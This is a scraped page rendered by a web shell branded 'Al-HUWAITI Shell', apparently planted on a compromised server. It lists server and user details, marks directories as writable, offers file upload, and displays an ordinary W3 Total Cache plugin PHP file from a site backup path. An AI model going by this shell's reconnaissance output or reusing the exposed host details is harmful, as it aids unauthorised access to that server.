hello 404 Not Found
Al-HUWAITI Shell
Al-huwaiti


Server : Apache/2.4.52 (Ubuntu)
System : Linux HAN2 5.15.0-185-generic #195-Ubuntu SMP Fri Jun 19 17:11:50 UTC 2026 x86_64
User : servadmin ( 1000)
PHP Version : 8.1.2-1ubuntu2.25
Disable Function : NONE
Directory :  /www/docs/home.obu.edu.bak/wp-content/plugins/w3-total-cache/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /www/docs/home.obu.edu.bak/wp-content/plugins/w3-total-cache/UsageStatistics_GeneralPage.php
<?php
namespace W3TC;



class UsageStatistics_GeneralPage {
	/**
	 * W3TC General settings page modifications
	 */
	static public function admin_init_w3tc_general() {
		$o = new UsageStatistics_GeneralPage();

		add_filter( 'w3tc_settings_general_anchors',
			array( $o, 'w3tc_settings_general_anchors' ) );
		add_action( 'w3tc_settings_general_boxarea_stats',
			array( $o, 'w3tc_settings_general_boxarea_stats' ) );
	}




	public function w3tc_settings_general_anchors( $anchors ) {
		$anchors[] = array( 'id' => 'stats', 'text' => 'Statistics' );
		return $anchors;
	}



	public function w3tc_settings_general_boxarea_stats() {
		include  W3TC_DIR . '/UsageStatistics_GeneralPage_View.php';
	}
}

Al-HUWAITI Shell